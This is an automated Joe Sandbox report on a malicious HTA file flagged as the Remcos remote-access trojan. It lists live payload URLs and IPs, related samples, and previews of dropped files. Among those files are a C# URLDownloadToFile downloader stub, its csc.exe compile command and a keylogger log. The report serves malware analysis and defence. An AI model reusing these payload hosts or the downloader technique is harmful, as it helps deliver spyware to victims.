                                                                              https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1776250099.000000000575C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.google.com/accounts/serviceloginCasPol.exefalse
                                                                                  high
                                                                                  https://login.yahoo.com/config/loginCasPol.exefalse
                                                                                    high
                                                                                    http://crl.microsoftXpowershell.exe, 00000007.00000002.1914783591.0000000002FFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.nirsoft.net/CasPol.exe, 0000000F.00000002.1941427909.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://github.com/koswald/VBScriptseethebestthingsforgetmebackwithgoodnewsthi.vbS.3.drfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1774693140.00000000046F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1915796517.0000000004D91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpgpowershell.exe, 00000007.00000002.1915796517.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://172.245.123.7/77/seethebestthingsforgetmebackwithgoodnewsthings.tIFMSILpowershell.exe, 00000003.00000002.1777596640.0000000006D85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.ebuddy.comCasPol.exe, CasPol.exe, 0000000F.00000002.1941427909.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                              high
                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs
                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              172.245.123.7
                                                                                              unknownUnited States
                                                                                              36352AS-COLOCROSSINGUStrue
                                                                                              178.237.33.50
                                                                                              geoplugin.netNetherlands
                                                                                              8455ATOM86-ASATOM86NLfalse
                                                                                              172.245.123.12
                                                                                              unknownUnited States
                                                                                              36352AS-COLOCROSSINGUStrue
                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                              Analysis ID:1590499
                                                                                              Start date and time:2025-01-14 06:12:05 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 9m 43s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:17
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:verynicegirlwalkingarounftheworldmuuuah.hta
                                                                                              Detection:MAL
                                                                                              Classification:mal100.rans.phis.troj.spyw.expl.evad.winHTA@24/20@3/3
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 85.7%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 99%
                                                                                              • Number of executed functions: 173
                                                                                              • Number of non-executed functions: 274
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .hta
                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 2.19.224.32, 104.17.202.1, 104.17.201.1, 20.109.210.53, 13.107.246.45
                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ion.cloudinary.com.edgekey.net, e1315.dsca.akamaiedge.net, resc.cloudinary.com.cdn.cloudflare.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                              • Execution Graph export aborted for target mshta.exe, PID 7236 because there are no executed function
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                              TimeTypeDescription
                                                                                              00:12:55API Interceptor99x Sleep call for process: powershell.exe modified
                                                                                              00:13:51API Interceptor7729933x Sleep call for process: CasPol.exe modified
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              178.237.33.50plugmancrypted.exeGet hashmaliciousRemcosBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              documents.exeGet hashmaliciousRemcosBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              17366735083ba4993c0ae9322c32aacf9286de757a918f634b522467c19ad3da2352651d39438.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              c2.htaGet hashmaliciousRemcosBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              c2.htaGet hashmaliciousRemcosBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              I1ahLI8fId.exeGet hashmaliciousRemcosBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              yPIOW6yoPi.exeGet hashmaliciousRemcosBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              bwYw3UUfy7.exeGet hashmaliciousRemcosBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              Material Requirments.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                              • geoplugin.net/json.gp
                                                                                              172.245.123.12Document.xlaGet hashmaliciousUnknownBrowse
                                                                                              • 172.245.123.12/233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta
                                                                                              createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                              • 172.245.123.12/233/createdbestthingswithenergylevelgoodforbusinesspuropse.tIF
                                                                                              Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                              • 172.245.123.12/233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta
                                                                                              Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                              • 172.245.123.12/233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta
                                                                                              Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                              • 172.245.123.12/233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta
                                                                                              seemebestgoodluckthings.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                              • 172.245.123.12/361/TELNERA.txt
                                                                                              PI-02911202409#.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                              • 172.245.123.12/361/TELNERA.txt
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              geoplugin.netplugmancrypted.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              documents.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              17366735083ba4993c0ae9322c32aacf9286de757a918f634b522467c19ad3da2352651d39438.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              c2.htaGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              c2.htaGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              I1ahLI8fId.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              yPIOW6yoPi.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              bwYw3UUfy7.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              Material Requirments.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                              • 178.237.33.50
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              AS-COLOCROSSINGUSdocuments.exeGet hashmaliciousRemcosBrowse
                                                                                              • 198.23.227.212
                                                                                              NOGHCV09800.bat.exeGet hashmaliciousRemcosBrowse
                                                                                              • 192.210.150.26
                                                                                              elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                              • 198.23.159.149
                                                                                              I1ahLI8fId.exeGet hashmaliciousRemcosBrowse
                                                                                              • 192.210.150.26
                                                                                              2iH7rqx9rQ.exeGet hashmaliciousRemcosBrowse
                                                                                              • 198.23.227.212
                                                                                              M6MafKT2pj.exeGet hashmaliciousRemcosBrowse
                                                                                              • 192.3.64.152
                                                                                              rZcI2tz327.exeGet hashmaliciousRemcosBrowse
                                                                                              • 192.210.150.26
                                                                                              Wk731bq71c.exeGet hashmaliciousRemcosBrowse
                                                                                              • 198.23.227.212
                                                                                              yPIOW6yoPi.exeGet hashmaliciousRemcosBrowse
                                                                                              • 198.23.227.212
                                                                                              C2R7VV2QmG.exeGet hashmaliciousRemcosBrowse
                                                                                              • 192.210.150.26
                                                                                              AS-COLOCROSSINGUSdocuments.exeGet hashmaliciousRemcosBrowse
                                                                                              • 198.23.227.212
                                                                                              NOGHCV09800.bat.exeGet hashmaliciousRemcosBrowse
                                                                                              • 192.210.150.26
                                                                                              elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                              • 198.23.159.149
                                                                                              I1ahLI8fId.exeGet hashmaliciousRemcosBrowse
                                                                                              • 192.210.150.26
                                                                                              2iH7rqx9rQ.exeGet hashmaliciousRemcosBrowse
                                                                                              • 198.23.227.212
                                                                                              M6MafKT2pj.exeGet hashmaliciousRemcosBrowse
                                                                                              • 192.3.64.152
                                                                                              rZcI2tz327.exeGet hashmaliciousRemcosBrowse
                                                                                              • 192.210.150.26
                                                                                              Wk731bq71c.exeGet hashmaliciousRemcosBrowse
                                                                                              • 198.23.227.212
                                                                                              yPIOW6yoPi.exeGet hashmaliciousRemcosBrowse
                                                                                              • 198.23.227.212
                                                                                              C2R7VV2QmG.exeGet hashmaliciousRemcosBrowse
                                                                                              • 192.210.150.26
                                                                                              ATOM86-ASATOM86NLplugmancrypted.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              documents.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              17366735083ba4993c0ae9322c32aacf9286de757a918f634b522467c19ad3da2352651d39438.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              c.htaGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              c2.htaGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              c2.htaGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              I1ahLI8fId.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              yPIOW6yoPi.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              bwYw3UUfy7.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              No context
                                                                                              No context
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):144
                                                                                              Entropy (8bit):3.3708727686148316
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:rglsKldvql55JWRal2Jl+7R0DAlBG45klovDl6v:Mlsfb5YcIeeDAlOWAv
                                                                                              MD5:E8106A9111D512235AC9764302795F87
                                                                                              SHA1:86A0365A3963D11DD5BFD72ACD9E68EC7B7ACBC4
                                                                                              SHA-256:58E0E42EC870F93D14CDA388C8285E07F3D0160AFEC6A161380A69DA673F1779
                                                                                              SHA-512:E3D75F77EDBA36CBE7CF834175B34242327A7006BFB9E441C3FD164E58C8F313ECD6D8A27F29CB7ADF75119DC80C2E2947BA78F09F849973A053897899F75723
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                              Preview:....[.2.0.2.5./.0.1./.1.4. .0.0.:.1.3.:.1.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (11274), with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):235047
                                                                                              Entropy (8bit):5.22901885652912
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:A8gVmI3b0mgfmWu+Pee9VOv5iG5sVhQ30Wk+70wgA1A:A8gVqee9VOvM
                                                                                              MD5:28EA1C4F19651AB6CFD1828943BD7913
                                                                                              SHA1:03FC2176B4BB04FD903C217EDD487EFEF0DD9505
                                                                                              SHA-256:9700962BC78CF83F0D780D391CFB1276490B0972D826424CD3631BDF78B24968
                                                                                              SHA-512:7C0479CCD140B149F8234171F53C4FDE63C7D27E007C8BF3FF3ECD1389954D87F53F69845025D2762292195BD0FD33264E3CC39DF00D7CB8003FD5210CE7E694
                                                                                              Malicious:false
                                                                                              Preview:Dim sh 'WScript.Shell object..Dim fso 'Scripting.FileSystemObject..Dim format 'StringFormatter object..Dim suiteFolder 'string: folder where test suite scripts are located..Dim projectFolder 'string: root folder for this project..Dim suiteFilter 'string: filename filter for selecting integration test suites...Dim caption 'string: MsgBox/PopUp title bar text...Dim aDocGens 'array of strings: filespecs for code-comment-based documentation generators...Dim aGits 'array of strings: common filespecs for Git bash and Git GUI executables...Dim aDocs 'array of strings: filespecs for last-minute docs to update before a push...Dim nextItem 'integer: current index of the prepItems array...Dim settings 'integer: controls MsgBox/PopUp behaviour...Dim prepItems 'array: list of prcedure (Sub) names to be called by window.SetTimeout...Dim flagFile 'string: filename of a temp file used by Setup.vbs...Dim versionLink 'web page with version info..Dim editor 'document editor..Dim powershell 'filespec of a
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):963
                                                                                              Entropy (8bit):5.018421233492188
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkv:qlupdVauKyGX85jvXhNlT3/7XcV7Wro
                                                                                              MD5:EB2FF94DBB57A448547893913F07269C
                                                                                              SHA1:DF7B8498413BA06578D4743941ED5664A88945FC
                                                                                              SHA-256:0FAD6CBFD4862A474081C36DF3E5E29F45A5EAC652C02BEF9E3637A7EB388B96
                                                                                              SHA-512:F2D29C38E688792AC270E45DC9213ED1C58ACEE67B7C18F4873296A9FC3D1B2F79B317712EFBCB1CDC9A637070C87605DE39387B5246A7B9644B15EF25494374
                                                                                              Malicious:false
                                                                                              Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7126",. "geoplugin_longitude":"-74.0066",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):5829
                                                                                              Entropy (8bit):4.901113710259376
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                              MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                              SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                              SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                              SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                              Malicious:false
                                                                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):1144
                                                                                              Entropy (8bit):5.290848674040258
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:32gSKco4KmZjKbmOIKod6lss4RPQoUP7mZ9t7J0gt/NKM9r8Hd:GgSU4xympgv4RIoUP7mZ9tK8NF9u
                                                                                              MD5:4331E6279D847E92D6B654CECE4305BF
                                                                                              SHA1:E52D3DA01374F7C5BF5C2BF2CCBB54C92AC388F5
                                                                                              SHA-256:54D683F53266320AAC50FF4F42DF00F95741BC9D870304FAB2E7EC0E9CFA3E6A
                                                                                              SHA-512:2F627A386BC8E0F7DC5E7BB0007DDFC4DD70874A5E35BAD2FFD033236141337C5F5B80D2844984A80FA9EAB9FC07B8D3DF8A43D6D64C18D1F2CE592DAD9CD404
                                                                                              Malicious:false
                                                                                              Preview:@...e...........................................................@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (361)
                                                                                              Category:dropped
                                                                                              Size (bytes):472
                                                                                              Entropy (8bit):3.6893732181806316
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:V/DsYLDS81zuL8b9Mm7jQXReKJ8SRHy4HaRbbrT3V6bQy:V/DTLDfuLCKXfHmpVdy
                                                                                              MD5:0E78A3764EC34C2C2E3C81C978660C95
                                                                                              SHA1:A8F89051D487578CC173F3FDFA512247A9C766E8
                                                                                              SHA-256:6AC8F316D174FADA84AACEE4991D18807FF23B2DD66A64ACC54D3DF8A713BD91
                                                                                              SHA-512:7B69D7B4E8878531A8F1C2574BA445D4F58F9C50FB21065B6214C23A6961173C83DE177A8B6CC2BF4D7928D5C7A10E11C26E8108DCF483C3761DD10911B887A4
                                                                                              Malicious:false
                                                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace EgNa.{. public class fVf. {. [DllImport("UrLMON.dLl", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr H,string KooP,string EqZ,uint tigm,IntPtr IngTYjZxUM);.. }..}.
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):369
                                                                                              Entropy (8bit):5.290763664537691
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fe54Mzxs7+AEszIwkn23fe54Pxn:p37Lvkmb6KRfuWZEifZx
                                                                                              MD5:63512CCCBBE6424AF974E295EE28EB06
                                                                                              SHA1:DB6B3F6388F8291E66252382FBFC2F5FBCA103C4
                                                                                              SHA-256:CEDFD9E8CA913A467BE37477B2AB821693F069FC7E95C407286669E530EBDEAD
                                                                                              SHA-512:2864326F67E8B0938416E58C3A08BEFE7A25AFF6628A0051A480267A0626F6EAD00338BE8D2051AAAAEF4C7D050344495DD18091975573A925067F8DC9E2D346
                                                                                              Malicious:true
                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.0.cs"
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):3072
                                                                                              Entropy (8bit):2.816231646497509
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:etGSGmmJ2J2F8800kyaxHlhWFtkZfr+tC+WI+ycuZhNBakSvPNnqI:6GmNUenLxHCwJrsCl1ulBa3tqI
                                                                                              MD5:A7C56FE74FED239C3CC3497D847E2500
                                                                                              SHA1:9CE2DD5DABBC977AE3D9235842D0B0D02D9CAE86
                                                                                              SHA-256:E0848BA32FCDBFE88CEA331C7B4D577CD3FDE4E3735033AC3578C42DD6E3CBFC
                                                                                              SHA-512:1314C2D37244D5932B20A0CC72F0A2805DB2928EF91A40000D1BD773EE492D1BA284C5DA7853B51CD6914FB97BA16FDD00CF4C1421BE04B399E7238607952CE8
                                                                                              Malicious:false
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................P#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................0.).....j.....j.......................................... 7.....P ......I.........O.....Q.....V.....Z....._...I.....I...!.I.....I.......!.....*.......7....................................... ..........<Module>.2q
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):867
                                                                                              Entropy (8bit):5.342925257789158
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:KJBqd3ka6KRfvEifZUKax5DqBVKVrdFAMBJTH:Cika6CvEuZUK2DcVKdBJj
                                                                                              MD5:C15E1E08F247956424B9AFA5768F9CDF
                                                                                              SHA1:A625BD7E3935F85E4B0987820EAA9EFB007EEBB3
                                                                                              SHA-256:9C2A518630F3B06C29F4F54C559230D25B1CC619244A8B61D01B1CA6F2774D75
                                                                                              SHA-512:D9E7E36F0453F9D212D540748CE91E74E040DAE8CDD83B700D5601D1FB408DA5840C2EC4BDFADE00F9220435D57B8B44CD7F662CB989788B2425A4BF7AB4DFAB
                                                                                              Malicious:false
                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:MSVC .res
                                                                                              Category:dropped
                                                                                              Size (bytes):652
                                                                                              Entropy (8bit):3.1306179308310567
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryzak7YnqqvPN5Dlq5J:+RI+ycuZhNBakSvPNnqX
                                                                                              MD5:BF321B69031AE226A561EE1465571FBA
                                                                                              SHA1:F4655BCB029959273E6873953CB22C66A725F2BE
                                                                                              SHA-256:41C57E7CED6BBE8E85EACBA8680ED567B9091FD54ACC5A73239F4CAFC234106D
                                                                                              SHA-512:97CD6D47B00CE09A6BC10B8627C61F6E6AE4BD2EC7B965325639D88D94F28BFD3ED1742DB54859FFB0A476F4BCC8AAAB794F7A0A2D4B1FF387AB7491EF95B5E7
                                                                                              Malicious:false
                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.q.f.3.p.w.z.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...2.q.f.3.p.w.z.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Jan 14 06:49:03 2025, 1st section name ".debug$S"
                                                                                              Category:dropped
                                                                                              Size (bytes):1328
                                                                                              Entropy (8bit):3.993011904259647
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:H0xe9E2+fRLeXDfHdJFwKEbsmfII+ycuZhNBakSvPNnqSqd:UDRLez9QKPmg1ulBa3tqSK
                                                                                              MD5:3ECDE825C886EEE13DF13006BE1FC4AC
                                                                                              SHA1:B6B5651D6BB414AE68068DFB92539FE039205FA3
                                                                                              SHA-256:F2EBF05247EE2BCF974BAFB775A35B2079AA68410CEFB2DC8234F5A2AF6BF93B
                                                                                              SHA-512:DC62516FE9B6447DE7BA75082491F531C00072B372F0503ACFDB42283B929DD0CD9BE6E2028F6101D0AAA8BA2472D035AB7D4E5587F5732F290D578FBB6034A1
                                                                                              Malicious:false
